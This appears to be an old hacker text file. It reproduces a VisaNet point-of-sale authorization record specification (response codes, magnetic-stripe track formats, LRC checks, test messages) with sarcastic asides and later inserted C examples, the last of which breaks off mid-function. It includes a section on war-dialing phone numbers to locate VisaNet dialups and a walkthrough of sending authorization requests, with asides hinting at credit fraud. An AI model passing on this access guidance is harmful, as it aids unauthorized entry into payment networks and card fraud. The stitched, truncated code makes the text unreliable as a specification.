and the industry type of the merchant. Table 4.24 provides a brief summary of
the current codes.


TABLE 4.24
Device Code/Industry Code


CODE  DEVICE TYPE                      CODE  INDUSTRY TYPE
0     Unknown or Unsure                0     Unknown or Unsure
1     RESERVED                         1     RESERVED
2     RESERVED                         2     RESERVED
3     RESERVED                         3     RESERVED
4     RESERVED                         4     RESERVED
5     RESERVED                         5     RESERVED
6     RESERVED                         6     RESERVED
7     RESERVED                         7     RESERVED
8     RESERVED                         8     RESERVED
9     RESERVED                         9     RESERVED
A     RESERVED                         A     RESERVED
B     RESERVED                         B     Bank/Financial Institution
C     P63                              C     RESERVED
D     Dial Terminal                    D     RESERVED
E     Electronic Cash Register (ECR)   E     RESERVED
F     RESERVED                         F     Food/Restaurant
G     RESERVED                         G     Grocery Store/Supermarket
H     RESERVED                         H     Hotel
I     In-Store Processor               I     RESERVED
J     RESERVED                         J     RESERVED
K     RESERVED                         K     RESERVED
L     RESERVED                         L     RESERVED
M     Main Frame                       M     Mail Order
N     RESERVED                         N     RESERVED
O     RESERVED                         O     RESERVED
P     POS-port                         P     RESERVED
Q     RESERVED for POS-port            Q     RESERVED
R     RESERVED                         R     Retail
S     RESERVED                         S     RESERVED
T     RESERVED                         T     RESERVED
U     RESERVED                         U     RESERVED
V     RESERVED                         V     RESERVED
W     RESERVED                         W     RESERVED
X     RESERVED                         X     RESERVED
Y     RESERVED                         Y     RESERVED
Z     RESERVED                         Z     RESERVED


4.25 FIELD SEPARATOR 


The authorization record format specifies the use of the "FS" character. 


4.26 ISSUING INSTITUTION ID/RECEIVING INSTITUTION ID 


This six-digit field is provided by the merchant signing member and is present 
when the terminal is used to process transactions which can not be routed using 
the cardholder Primary Account Number. When a value is present in this field, 
it is used as an RIID for all valid transaction codes, field 4.12, except 81 
through 88. This field is used as an IIID for transaction codes 81 through 88. 
Table 4.26 provides a summary of the RIID codes for check acceptance. 


TABLE 4.26 
Check Acceptance RIID Values 


Vendor RIID 
JBS, Inc 810000 
Telecheck 861400 
TeleCredit, West 894300 [note; telecredit has been 
TeleCredit, East 894400 mutated/eaten by equifax] 


4.27 FIELD SEPARATOR 


The authorization record format specifies the use of the "FS" character. 


4.28 SECONDARY AMOUNT (CASHBACK) 


NOTE: "Cashback" is NOT allowed on Visa cards when the Customer Data Field, 
see section 4.18, has been manually entered. 
This is a variable length field from three to twelve digits in length. The 
Secondary Amount is included in field 4.22, Transaction Amount. 


The secondary amount is presented by the terminal with an implied decimal point. 
For example $.01 would be represented in the record as "001". This field will 
contain 000 when no secondary amount has been requested. Therefore, when th 
terminal is used with an authorization system which supports the US dollar as 
the primary currency, the secondary amount field must be limited to seven 
digits (9999999). The terminal may be used with authorization systems which 
support other currencies that require the full twelve-digit field. 


4.29 FIELD SEPARATOR 


The authorization record format specifies the use of the "FS" character. 


4.30 MERCHANT NAME


This 25-character field contains the merchant name provided by the signing
member. The name must correspond to the name printed on the customer receipt.
The name is left justified with space fill. The first character position can
not be a space. This field must contain the same data used in the data capture
batch.


4.32 MERCHANT STATE


This two-character field contains the merchant location state abbreviation
provided by the signing member. The abbreviation must correspond to the state
name printed on the customer receipt and be one of the Visa accepted
abbreviations. This field must contain the same data used in the data capture
batch.


4.33 SHARING GROUP 


This one to fourteen-character field contains the group of debit card/network
types that a terminal may have access to and is provided by the signing member.
The values must correspond to one of the Visa assigned debit card/network
types. This data is part of the VisaNet debit data.


4.34 FIELD SEPARATOR 


The authorization record format specifies the use of the "FS" character. 




4.35 MERCHANT ABA NUMBER 


This fixed length field is twelve digits in length. If this field is not used, 
its length must be zero. If this field is not used, the following field must 
also be empty. 


This number identifies the merchant to a debit switch provided by the signing 
member. The number is provided by the signing member. 


4.36 MERCHANT SETTLEMENT AGENT NUMBER 


This fixed length field is four digits in length. If this field is not used, 
its length must be zero. If this field is not used, the previous field must 
also be empty. 


This number identifies the merchant settling agent. The number is provided by 
the signing member. 


4.37 FIELD SEPARATOR 


The authorization record format specifies the use of the "FS" character. 


4.38 AGENT NUMBER 


This six-digit field contains an agent number assigned by the signing member. 
The number identifies an institution which signs merchants as an agent of a 
member. The member uses this number to identify the agent within the member 
systems. The acquirer BIN, Agent, Chain, Merchant, Store, and Terminal numbers 
are required to uniquely identify a terminal within the VisaNet systems. 


4.39 CHAIN NUMBER 


This six-digit field contains a merchant chain identification number assigned
by the signing member. The member uses this number to identify the merchant
chain within the member systems. The acquirer BIN, Agent, Chain, Merchant, 
Store, and Terminal numbers are required to uniquely identify a terminal within 
the VisaNet systems. 


4.40 BATCH NUMBER 


This three-digit field contains a batch sequence number generated by the
terminal. The number will wrap from 999 to 001. This number is the data
capture batch number.


4.41 REIMBURSEMENT ATTRIBUTE


This is a single character fixed length field.
This field contains the reimbursement attribute assigned by the signing member.
This field must be a "space".


4.42 FIELD SEPARATOR


The authorization record format specifies the use of the "FS" character.


4.43 APPROVAL CODE


This contains a six-character fixed length field. 


This field is only present in cancel transactions and contains the original 
approval code from the original transaction. 


The approval code was returned in the authorization response of the transaction 
to be canceled. 


4.44 SETTLEMENT DATE


This contains a four-digit fixed length field. 


This field is only present in cancel transactions and contains the settlement 
date from the original transaction and is in the format MMDD. 


The settlement date was returned in the authorization response of the 
transaction to be canceled. 


4.45 LOCAL TRANSACTION DATE


This contains a four-digit fixed length field. 


This field is only present in cancel transactions and contains the transaction 
date from the original transaction and is in the format MMDD. 


The transaction date was returned in the authorization response of the 
transaction to be canceled as MMDDYY. 


4.46 LOCAL TRANSACTION TIME 


This contains a six-digit fixed length field.


This field is only present in cancel transactions and contains the transaction 
time from the original transaction and is in the format HHMMSS. 


The transaction time was returned in the authorization response of the 
transaction to be canceled. 


4.47 SYSTEM TRACE AUDIT NUMBER 


This contains a six-character fixed length field. 


This field is only present in cancel transactions and contains the trace audit 
number from the original transaction. 


The trace audit number was returned in the authorization response of the 
transaction to be canceled. 


4.48 ORIGINAL AUTHORIZATION TRANSACTION CODE


The field is a two-character fixed length field and must contain the original
AUTHORIZATION TRANSACTION CODE (field 4.12) of the transaction to be canceled.
Currently, the only transaction that can be canceled is an Interlink Debit
Purchase.


4.49 NETWORK IDENTIFICATION CODE


This contains a single character fixed length field. 


This field is only present in cancel transactions and contains the network ID 
from the original transaction. 


The network ID was returned in the authorization response of the transaction to
be canceled.


4.50 FIELD SEPARATOR 


The authorization record format specifies the use of the "FS" character. 


5.0 RESPONSE RECORD DATA ELEMENT DEFINITIONS 


The following subsections will define the authorization response record data 
elements. 


5.01 PAYMENT SERVICE INDICATOR 


This field contains the one-character payment service indicator. It must be 
placed in the batch detail record for terminals that capture. 


Table 5.01 provides a summary of current Values. 


TABLE 5.01 
Payment Service Indicator Values 


VALUE   DESCRIPTION
A       REPS qualified
Y       Requested a "Y" in field 4.14 and there was a problem
        REPS denied (VAS edit error or BASE I reject)
N       Requested an "N" in field 4.14 or requested a "Y" in field
        4.14 and request was downgraded (by VAS)
space   If "Y" sent and transaction not qualified (VAS downgrade)


5.02 STORE NUMBER 


This four-digit number is returned by VisaNet from the authorization request for 
formats "J" and "G", and can be used to route the response within a store 
controller and/or a store concentrator. 


5.03 TERMINAL NUMBER 


This four-digit number is returned by VisaNet from the authorization request for 
formats "J" and "G", and can be used to route the response within a store 
controller and/or a store concentrator. 


5.04 AUTHORIZATION SOURCE CODE 


This field contains a one-character code that indicates the source of the 
authorization. The received code must be placed in the data capture detail 
transaction record when data capture is enabled. 


Table 5.04 provides a summary of current codes. 


TABLE 5.04 
Authorization Source Codes 


Code  Description
1     STIP: time-out response
2     LCS: amount below issuer limit
3     STIP: issuer in Suppress-Inquiry mode
4     STIP: issuer unavailable
5     Issuer approval
6     Off-line approval, POS device generated
7     Acquirer approval: BASE I unavailable
8     Acquirer approval of a referral
9     Use for non-authorized transactions; such as credit card credits [yum!]
D     Referral: authorization code manually keyed
E     Off-line approval: authorization code manually keyed


5.05 TRANSACTION SEQUENCE NUMBER


This field contains the four-digit code which was generated by the terminal as 
the sequence number for the transaction and passed to the authorization center 
in the authorization request record. The sequence number can be used by the 
terminal to match request and response messages. The transaction sequence 
number is returned by VisaNet without sequence verification. 


5.06 RESPONSE CODE 


This field contains a two-character response code indicating the status of the 
authorization. 


Table 5.06 provides the response codes for formats "J" and "G". A response code 
of "00" represents an approval. A response code of "85" represents a successful 
card verification returned by TRANSACTION CODES 58, 68, and 88. All other 
response codes represent a non-approved request. 


The value returned is stored in the batch transaction detail record for 
terminals that capture. 


TABLE 5.06
Authorization Response Codes For Record Formats "J" & "G"


Authorization       Response                                            AVS Result
Response Message    Code      Response Definition                       Code

EXACT MATCH         00        Exact Match, 9 digit zip                  X
EXACT MATCH         00        Exact Match, 5 digit zip GRIND            Y
ADDRESS MATCH       00        Address match only                        A
ZIP MATCH           00        9-digit zip match only                    W
ZIP MATCH           00        5-digit zip match only GRIND              Z
NO MATCH            00        No address or zip match                   N
VER UNAVAILABLE     00        Address unavailable                       U
RETRY               00        Issuer system unavailable                 R
ERROR INELIGIBLE    00        Not a mail/phone order                    E
SERV UNAVAILABLE    00        Service not supported                     S

APPROVAL            00        Approved and completed                    see above
CARD OK             85        No reason to decline                      see above
CALL                01        Refer to issuer                           0
CALL                02        Refer to issuer - Special condition       0
NO REPLY            28        File is temporarily unavailable           0
NO REPLY            91        Issuer or switch is unavailable           0
HOLD-CALL           04        Pick up card                              0
HOLD-CALL           07        Pick up card - Special condition          0
HOLD-CALL           41        Pick up card - Lost                       0
HOLD-CALL           43        Pick up card - Stolen                     0
ACCT LENGTH ERR     EA        Verification Error                        0
ALREADY REVERSED    79        Already Reversed at Switch [ya got me]    0
AMOUNT ERROR        13        Invalid amount                            0
CAN’T VERIFY PIN    83        Can not verify PIN                        0
CARD NO ERROR       14        Invalid card number                       0
CASHBACK NOT APP    82        Cashback amount not approved              0
CHECK DIGIT ERR     EB        Verification Error                        0
CID FORMAT ERROR    EC        Verification Error                        0
DATE ERROR          80        Invalid Date                              0
DECLINE             05        Do not honor                              0
DECLINE             51        Not Sufficient Funds                      0
DECLINE             61        Exceeds Withdrawal Limit                  0
DECLINE             65        Activity Limit Exceeded                   0
ENCRYPTION ERROR    81        Cryptographic Error                       0
ERROR XXX           06        General Error                             0
ERROR XXXX          06        General Error                             0
EXPIRED CARD        54        Expired Card                              0
INVALID ROUTING     98        Destination Not Found                     0
INVALID TRANS       12        Invalid Transaction                       0
NO CHECK ACCOUNT    52        No Check Account                          0
NO SAVE ACCOUNT     54        No Save Account                           0
NO SUCH ISSUER      15        No Such Issuer                            0
RE ENTER            19        Re-enter Transaction                      0
SEC VIOLATION       63        Security Violation                        0
SERV NOT ALLOWED    57        Trans. not permitted-Card                 0
SERV NOT ALLOWED    58        Trans. not permitted-Terminal             0
SERVICE CODE ERR    62        Restricted Card                           0
SYSTEM ERROR        96        System Malfunction [whoop whoop!]         0
TERM ID ERROR       03        Invalid Merchant ID                       0
WRONG PIN           55        Incorrect PIN                             0
XXXXXXXXXXXXXXXXXX  XX        Undefined Response                        0


5.07 APPROVAL CODE


This field contains a six-character code when a transaction has been approved. 
If the transaction is not approved the contents of the field should be ignored. 
The approval code is input to the data capture detail transaction record. 


5.08 LOCAL TRANSACTION DATE


This field contains a six-digit local date calculated (MMDDYY) by the
authorization center using the time zone differential code provided in the
authorization request message. This date is used by the terminal as the date to
be printed on the transaction receipts and audit reports, and as the date input
to the data capture transaction detail record. This field is only valid for
approved transactions.


5.09 AUTHORIZATION RESPONSE MESSAGE


This field is a sixteen-character field containing a response display message. 
This message is used by the terminal to display the authorization results. 


Table 5.06 provides the message summary. The messages are provided with "sp" 
space fill. This field is mapped to the RESPONSE CODE, field 5.06, for all 
non-AVS transactions and for all DECLINED AVS transactions. For APPROVED AVS 
transactions (response code = "00" or "85"), it is mapped to the AVS RESULT 
CODE, field 5.10. 


5.10 AVS RESULT CODE


This one-character field contains the address verification result code. An 
address verification result code is provided for transactions and provides an 
additional indication that the card is being used by the person to which the 
card was issued. The service is only available for mail/phone order 
transactions. 


Table 5.06 provides a summary of the AVS Result Codes. 


An ANSI X3.4 "0" is provided for all non-AVS transactions and all declined 
transactions. 


5.11 TRANSACTION IDENTIFIER 


This numeric field will contain a transaction identifier. The identifier will
be fifteen digits in length if the payment service indicator value is an "A" or
it will be zero in length if the payment service indicator value is not an "A".
This value is stored in the batch detail record for terminals that capture and
is mandatory for REPS qualification.


5.12 FIELD SEPARATOR 


The authorization record format specifies the use of the "FS" character. 


5.13 VALIDATION CODE


This alphanumeric field will contain a validation code. The code will contain a
four-character value if the payment service indicator value is an "A" or it will
be zero in length if the payment service indicator value is not an "A". This
value is stored in the batch detail record for terminals that capture and is
mandatory for REPS qualification.


5.14 FIELD SEPARATOR 


The authorization record format specifies the use of the "FS" character. 


5.15 NETWORK IDENTIFICATION CODE


This one-character fixed length field contains the identification code of the 
network on which the transaction was authorized. The network ID must be printed 
on the receipt. 


5.16 SETTLEMENT DATE


This four-digit fixed length field contains the transaction settlement date 
returned by the authorizing system (MMDD). The settlement date must be printed 
on the receipt. 


5.17 SYSTEM TRACE AUDIT NUMBER 


This six-character fixed length field contains a trace audit number which is 
assigned by the authorizing system. The trace audit number must be printed on 
the receipt. 


5.18 RETRIEVAL REFERENCE NUMBER 


This twelve-character fixed length field contains the transaction retrieval 
reference number returned by the authorizing system. The reference number 
should be printed on the receipt. 


5.19 LOCAL TRANSACTION TIME


This six-digit fixed length field contains the transaction time returned by the 
authorizing system (HHMMSS). The time must be printed on the receipt. 


6.0 CONFIRMATION RECORD DATA ELEMENT DEFINITIONS 


The following subsections define the debit confirmation response record data 
elements. 


6.01 NETWORK IDENTIFICATION CODE


This one character fixed length field contains the identification code of the 
network on which the transaction was authorized. The network ID is printed on 
the receipt. 


6.02 SETTLEMENT DATE 


This four-digit fixed length field contains the transaction settlement date 
returned by the authorizing system. 




6.03 SYSTEM TRACE AUDIT NUMBER 


This six-character fixed length field contains the system trace audit number 
which is assigned by the authorizing system. 


7.0 CHARACTER CODE DEFINITIONS 


The following subsections will define the authorization request record character 
set and character sets used for track 1 and track 2 data encoded on the magnetic 
stripes. 


The authorization request records are generated with characters defined by ANSI 
X3.4-1986. The data stored on the cardholder’s card in magnetic or optical form 
must be converted to the ANSI X3.4 character set before transmission to VisaNet. 


Section 7.01 provides track 1 character set definition. Section 7.02 provides
track 2 character set definition. Section 7.03 provides the ANSI X3.4-1986 and
ISO 646 character set definitions. Section 7.04 provides a cross reference 
between the track 1, track 2, and ANSI X3.4 character sets. Section 7.05 
describes the method for generating and checking the Mod 10 Luhn check digit for 
credit card account numbers. Section 7.06 describes the method for generating 
the LRC byte for the authorization request message and for testing the card 
swipe’s LRC byte. Section 7.07 provides sample data for an authorization 
request and response for record format "J" testing. 


The POS device/authorization must perform the following operations on track
read data before it can be used in an authorization request message:


1. The LRC must be calculated for the data read from the track and compared
   to the LRC read from the track. The track data is assumed to be read
   without errors when no character parity errors are detected and the
   calculated and read LRC’s match.


2. The starting sentinel, ending sentinel, and LRC are discarded.


3. The character codes read from the magnetic stripe must be converted from
   the encoded character set to the set used for the authorization request
   message. The characters encoded on track 1 are six-bit plus parity codes
   and the characters encoded on track 2 are four-bit plus parity codes, with
   the character set used for the request message defined as seven-bit plus
   parity codes.


All characters read from a track must be converted to the request message
character set and transmitted as part of the request. The converted track data
can not be modified by adding or deleting non-framing characters and must be a
one-for-one representation of the characters read from the track. [sounds like
they mean it, eh?]


7.01 TRACK 1 CHARACTER DEFINITION


Table 7.01 provides the ISO 7811-2 track 1 character encoding definitions. This 
"standards" format is a SAMPLE guideline for expected credit card track 
encoding; ATM/debit cards may differ. Actual cards may differ [not], whether 
they are Visa cards or any other issuer’s cards. 


Each character is defined by the six-bit codes listed in Table 7.01. 


Track 1 can be encoded with up to 79 characters as shown in Figure 7.01.


SS|FC| PAN|FS| NAME|FS| DATE| DISCRETIONARY DATA |ES|LRC


LEGEND
Field                Description                           Length     Format
SS                   Start Sentinel                        1          %
FC                   Format Code ("B" for credit cards)    1          A/N
PAN                  Primary Account Number                19 max     NUM
FS                   Field Separator                       1          ^
NAME                 Card Holder Name (See NOTE below)     26 max     A/N
FS                   Field Separator                       1          ^
DATE                 Expiration Date (YYMM)                4          NUM
Discretionary Data   Option Issuer Data (See NOTE below)   variable   A/N
ES                   End Sentinel                          1          ?
LRC                  Longitudinal Redundancy Check

Total CAN NOT exceed 79 bytes----->  79


FIGURE 7.01
Track 1 Encoding Definition


NOTE: The CARD HOLDER NAME field can include a "/" as the surname separator
and a "." as the title separator.

The DISCRETIONARY DATA can contain any of the printable characters from
Table 7.01.


TABLE 7.01
Track 1 Character Definition

                          b6    0     0     1     1
          BIT NUMBER      b5    0     1     0     1
b4  b3  b2  b1   ROW/COL        0     1     2     3
0   0   0   0       0           SP    0     (a)   P
0   0   0   1       1           (a)   1     A     Q
0   0   1   0       2           (a)   2     B     R
0   0   1   1       3           (c)   3     C     S
0   1   0   0       4           $     4     D     T
0   1   0   1       5           (%)   5     E     U
0   1   1   0       6           (a)   6     F     V
0   1   1   1       7           (a)   7     G     W
1   0   0   0       8           (     8     H     X
1   0   0   1       9           )     9     I     Y
1   0   1   0       A           (a)   (a)   J     Z
1   0   1   1       B           (a)   (a)   K     (b)
1   1   0   0       C           (a)   (a)   L     (b)
1   1   0   1       D           -     (a)   M     (b)
1   1   1   0       E           (.)   (a)   N     (^)
1   1   1   1       F           (/)   (?)   O     (a)

(a)  These character positions are for hardware use only
(b)  These characters are for country use only, not international use
(c)  These characters are reserved for added graphic use [nifty]
(%)  Start sentinel
(?)  End sentinel
(^)  Field Separator
(/)  Surname separator
(.)  Title separator
(SP) Space

PAR|MSB|B5|B4|B3|B2|LSB
 |   |--- Most Significant Bit
 |--- Parity Bit (ODD)
Read LSB First


7.02 TRACK 2 CHARACTER DEFINITION


Table 7.02 provides the ISO 7811-2 track 2 character encoding definitions. This
"standards" format is a SAMPLE guideline for expected credit card track
encoding; ATM/debit cards may differ. Actual cards may differ, whether they are
Visa cards or any other issuer’s cards.


Each character is defined by the four-bit codes listed in Table 7.02.


Track 2 can be encoded with up to 40 characters as shown in Figure 7.02.


SS | PAN |FS| DATE| DISCRETIONARY DATA |ES|LRC


LEGEND:
Field                Description                           Length     Format
SS                   Start Sentinel                        1          0B hex
PAN                  Primary Account Number                19 max     NUM
FS                   Field Separator                       1          =
Discretionary Data   Option Issuer Data (See NOTE below)   variable   A/N
ES                   End Sentinel                          1          0F hex
LRC                  Longitudinal Redundancy Check         1

Total CAN NOT exceed 40 bytes----->  40


FIGURE 7.02
Track 2 Encoding Definition


NOTE: The PAN and DATE are always numeric. The DISCRETIONARY DATA can be
numeric with optional field separators as specified in Table 7.02.


TABLE 7.02
Track 2 Character Set


b4  b3  b2  b1    COL
0   0   0   0      0      0
0   0   0   1      1      1
0   0   1   0      2      2
0   0   1   1      3      3
0   1   0   0      4      4
0   1   0   1      5      5
0   1   1   0      6      6
0   1   1   1      7      7
1   0   0   0      8      8
1   0   0   1      9      9
1   0   1   0      A      (a)
1   0   1   1      B      (B)
1   1   0   0      C      (a)
1   1   0   1      D      (D)
1   1   1   0      E      (a)
1   1   1   1      F      (F)

(a)  These characters are for hardware use only
(B)  Starting Sentinel
(D)  Field Separator
(F)  Ending Sentinel

PAR | MSB | b3 | b2 | LSB
 |     |--- Most Significant Bit
 |--- Parity Bit (ODD)
Read LSB first

[ tables 7.03a, 7.03b, and 7.04 deleted...
If you really need a fucking ascii table that bad go buy a book.]


[ section 7.05 - Account Data Luhn Check deleted...
as being unnecessary obtuse and roundabout in explaining how the check works.
the routine written by crazed luddite and murdering thug is much clearer. ]


7.06 CALCULATING AN LRC 


When creating or testing the LRC for the read of the card swipe, the
authorization request record, the debit confirmation record or the VisaNet
response record, use the following steps to calculate the LRC:


1) The value of each bit in the LRC character, excluding the parity bit, is
defined such that the total count of ONE bits encoded in the corresponding
bit location of all characters of the data shall be even (this is also known
as an EXCLUSIVE OR (XOR) operation).


For card swipes, include the start sentinel, all the data read and
the end sentinel.


For VisaNet protocol messages, begin with the first character past
the STX, up to and including the ETX.


2) The LRC character’s parity bit is not a parity bit for the individual parity
bits of the data message, but is only the parity bit for the LRC character
itself. It is calculated as an even parity bit.


[ i list a routine for calculating an LRC on a string later on in the document ]
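

The three track-read operations from section 7.0, applied to track 2 with the parity and LRC rules of Table 7.02 and section 7.06, as an added example that is not part of the original document. The function names, result codes, the constructed sample swipe and the 0x30-plus-code conversion to ANSI X3.4 (which yields "=" for the field separator, as in Figure 7.02) are assumptions of the example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Result codes; the names are this example's own. */
enum { T2_OK = 0, T2_PARITY = -1, T2_FRAMING = -2, T2_LRC = -3, T2_NOSPACE = -4 };

#define T2_SS  0x0B   /* start sentinel (Table 7.02) */
#define T2_FS  0x0D   /* field separator */
#define T2_ES  0x0F   /* end sentinel */
#define T2_MAX 40     /* Figure 7.02: SS through LRC */

/* Count the one bits in the low five bits (four data bits plus parity). */
static int ones5(unsigned char c)
{
    int n = 0, i;
    for (i = 0; i < 5; i++)
        n += (c >> i) & 1;
    return n;
}

/* Set bit 4 so that the five-bit character carries odd parity. */
static unsigned char with_odd_parity(unsigned char code)
{
    code &= 0x0F;
    return (unsigned char)((ones5(code) & 1) ? code : (code | 0x10));
}

/*
 * raw[0..n-1] holds one swipe as five-bit characters: SS, data, ES, LRC.
 * Step 1: every character up to ES must have odd parity, and the XOR of
 *         their data bits must equal the data bits of the LRC.
 * Step 2: SS, ES and LRC are discarded.
 * Step 3: each remaining code becomes one ANSI X3.4 character (0x30 + code).
 * The LRC character's own parity bit is not inspected here.
 */
int t2_decode(const unsigned char *raw, size_t n, char *out, size_t outsz)
{
    unsigned char lrc = 0;
    size_t i;

    if (n < 3 || n > T2_MAX)
        return T2_FRAMING;
    if (outsz < n - 2)                  /* n-3 data characters plus NUL */
        return T2_NOSPACE;

    for (i = 0; i + 1 < n; i++) {
        if ((ones5(raw[i]) & 1) == 0)
            return T2_PARITY;
        lrc ^= raw[i] & 0x0F;
    }
    if ((raw[0] & 0x0F) != T2_SS || (raw[n - 2] & 0x0F) != T2_ES)
        return T2_FRAMING;
    if ((raw[n - 1] & 0x0F) != lrc)
        return T2_LRC;

    for (i = 1; i + 2 < n; i++) {
        unsigned char code = raw[i] & 0x0F;
        if (code > 9 && code != T2_FS)  /* only digits and FS are data */
            return T2_FRAMING;
        out[i - 1] = (char)(0x30 + code);
    }
    out[n - 3] = '\0';
    return T2_OK;
}

/* Build a constructed sample swipe from ASCII text of the form ";...?" and
   append its LRC. Returns the number of five-bit characters written. */
size_t t2_sample(const char *ascii, unsigned char *raw, size_t rawsz)
{
    unsigned char lrc = 0;
    size_t i, n = strlen(ascii);

    if (n + 1 > rawsz)
        return 0;
    for (i = 0; i < n; i++) {
        unsigned char code = (unsigned char)(ascii[i] - 0x30) & 0x0F;
        lrc ^= code;
        raw[i] = with_odd_parity(code);
    }
    raw[n] = with_odd_parity(lrc);
    return n + 1;
}

int main(void)
{
    unsigned char raw[T2_MAX];
    char text[T2_MAX];
    /* Constructed sample: the document's test card number, expiry as YYMM. */
    size_t n = t2_sample(";4444111122223333=9604?", raw, sizeof raw);
    int rc = t2_decode(raw, n, text, sizeof text);

    printf("rc=%d data=%s\n", rc, rc == T2_OK ? text : "(rejected)");
    return rc == T2_OK ? 0 : 1;
}
```

A single flipped bit is caught by the per-character parity check; two flipped bits in one character pass parity and are caught only by the LRC comparison.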


7.07 TEST DATA FOR RECORD FORMAT "J" 


The following two sections provide sample data for testing record format "J" 
with the VisaNet dial system. 


7.07.01 TEST DATA FOR A FORMAT "J" AUTHORIZATION REQUEST 


Table 7.07a provides a set of test data for record format "J" authorization 
request. 


TABLE 7.07a
Test Data For Record Format "J"

Test Data        Byte #   Length     Format   Field Name
J                1        1          A/N      Record Format
0, 2, or 4       2        1          A/N      Application Type
.                3        1          A/N      Message Delimiter
401205           4-9      6          A/N      Acquirer BIN
123456789012     10-21    12         NUM      Merchant Number
0001             22-25    4          NUM      Store Number
0001             26-29    4          NUM      Terminal Number
5999             30-33    4          NUM      Merchant Category Code
840              34-36    3          NUM      Merchant Country Code
94546            37-41    5          A/N      Merchant City Code
108              42-44    3          NUM      Time Zone Differential
54               45-46    2          A/N      Authorization Transaction Code
12345678         47-54    8          NUM      Terminal Identification Number
Y                55       1          A/N      Payment Service Indicator
0001 *           56-59    4          NUM      Transaction Sequence Number
@                60       1          A/N      Cardholder Identification Code
D, H, T, or X    61       1          A/N      Account Data Source
Track or                                      Customer Data Field
Manual Data
"FS"             N.A.     1          "FS"     Field Separator
0000123          N.A.     0 to 43    A/N      Transaction Amount
"FS"             N.A.     1          "FS"     Field Separator
ER               N.A.     0 or 2     A/N      Device Code/Industry code
"FS"             N.A.     1          "FS"     Field Separator
                 N.A.     0 or 6     NUM      Issuing/Receiving Institution ID
"FS"             N.A.     1          "FS"     Field Separator
000              N.A.     3 to 12    NUM      Secondary Amount (Cashback)
"FS"             N.A.     1          "FS"     Field Separator

NOTE: * Denotes fields that are returned in the response message


7.07.02 RESPONSE MESSAGE FOR TEST DATA


Table 7.07b provides the response message for the test data provided in section
7.07.01.


TABLE 7.07b
Response Message For Test Data - Record Format "J"

Test Data            Byte #   Length    Format   Field Name
A, Y, N, or       *  1        1         A/N      Payment Service Indicator
"space"
0001              *  2-5      4         NUM      Store Number
0001              *  6-9      4         NUM      Terminal Number
5                 *  10       1         A/N      Authorization Source Code
0001                 11-14    4         NUM      Transaction Sequence Number
00                *  15-16    2         A/N      Response Code
12AB45            *  17-22    6         A/N      Approval Code
111992            *  23-28    6         NUM      Transaction Date (MMDDYY)
AP                   29-44    16        A/N      Authorization Response Message
0, Sp, or "FS"       45       1         A/N      AVS Result Code
*Variable                     0 or 15   NUM      Transaction Identifier
"FS"                                    "FS"     Field Separator
*Variable                     0 or 4    A/N      Validation Code
"FS"                                    "FS"     Field Separator

NOTE: * Move to data capture record for VisaNet Central Data Capture (CDC)


[ section two ] 
[ finding visanet ] 


finding visanet isn’t hard, but it can be tedious. visanet rents time off of
compuserve and X.25 networks. the compuserve nodes used are not the same
as their information service, cis. to identify a visanet dialup after
connecting, watch for three enq characters and a three second span to hangup.
if you’ve scanned out a moderate portion of your area code, you probably have a
few dialups. one idea is to write a short program to dial all the connects you
have marked as garbage or worthless [ you did keep em, right? ] and wait
for the proper sequence. X.25 connections should work similarly, but i don’t
know for sure. read the section on visanet usage for other dialup sources.


[ section three ] 
[ visanet link level protocol ] 


messages to/from visanet have a standard format: 


stx-message-etx-lrc


the message portion is the record formats covered in section one. lrc values
are calculated starting with the first byte of message, going up to and
including the etx character. heres an algorithm that calculates the lrc for a
string. note: in order to work with the visanet protocols, append etx to the
string before calling this function.


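/* XOR together every byte of a NUL-terminated string; the result is the lrc. */
unsigned char func_makelrc(const char *buff)
{
    unsigned char ch = 0;
    const char *p;

    for (p = buff; *p; p++)        /* stop at the terminating NUL */
        ch ^= (unsigned char)*p;

    return ch;
}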


for a single authorization exchange, the easiest kind of transaction, the 
sequence goes like this: 


host    enq                         stx-response-etx-lrc         eot
term          stx-request-etx-lrc                          ack


<disconnect> 


matching this sequence with test record formats from section one, 7.07, heres 
an ascii representation of a transaction. control characters denoted in <>’s. 
[of course, you wouldn’t really have a carriage return in middle of a message. 
duh. ] this transaction would be for card number 4444111122223333 with an 
expiration date of 04/96. the purchase amount is $1.23. visanet responds with 
an approval code of 12ab45. 


host: <enq>


term: <stx>J0.401205123456789012000100015999840945461085412345678Y0001@H444411 
1122223333<fs>0496<fs>0000123<fs>ER<fs><fs>000<fs><etx><lrc> 


host: <stx>Y00010001500010012AB45111992APPROVAL 12AB45123456789012345<fs> 
ABCD<fs><etx><lrc> 


term: <ack>
host: <eot>


authorizing multiple transactions during one connect session is only slightly
more complicated. the etx character on all messages sent to visanet are changed
to etb and the application type is changed from ’0’ to ’2’ [section one 4.02].
instead of responding after a transaction with eot, visanet instead polls the
terminal again with enq. this continues until the terminal either changes back
to the single transaction format or issues an eot to the host.


heres a short list of all control characters used: 


stx: start-of-text, first message framing character signaling message start
etx: end-of-text, the frame ending character of the last message of a sequence
eot: end-of-transmission, used to end an exchange and signal disconnect
enq: enquiry, an invitation to transmit a message or retransmit last item
ack: affirmative acknowledgment, follows correct reception of message
nak: negative acknowledgment, used to indicate that the message was not
     understood or was received with errors
syn: delay character, wait thirty seconds
etb: end-of-block, the end framing character used to signal the end of a message
     within a multiple message sequence


other quick notes: visanet sometimes sends ack before stx on responses
                   lrc characters can hold any value, such as stx, nak, etc
                   visanet can say goodbye at any time by sending eot
                   people can get very anal about error flow diagrams
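

An added example, not from the original article, of a receiver for the stx-message-etx-lrc frame that covers the quick notes above: an ack ahead of stx, etb in place of etx, and an lrc byte that happens to equal a control character. The names, result codes and sample frames are constructed for illustration, and parity is assumed to have been stripped by the serial layer.

```c
#include <stddef.h>
#include <stdio.h>

/* ANSI X3.4 control characters used by the link level protocol. */
enum { STX = 0x02, ETX = 0x03, ACK = 0x06, NAK = 0x15, ETB = 0x17, FS = 0x1C };

/* Parse results; the names are this example's own. */
enum { FRAME_GOOD = 0, FRAME_BAD_LRC = 1, FRAME_INCOMPLETE = 2, FRAME_NO_STX = 3 };

struct frame {
    const unsigned char *msg;  /* first byte after stx */
    size_t len;                /* message bytes, terminator excluded */
    int last;                  /* 1 = ended with etx, 0 = etb (more to come) */
    size_t used;               /* bytes consumed from the buffer, lrc included */
};

int frame_parse(const unsigned char *buf, size_t n, struct frame *f)
{
    size_t i = 0, start;
    unsigned char lrc = 0;

    if (n > 0 && buf[0] == ACK)      /* an ack may arrive ahead of stx */
        i = 1;
    if (i >= n)
        return FRAME_INCOMPLETE;
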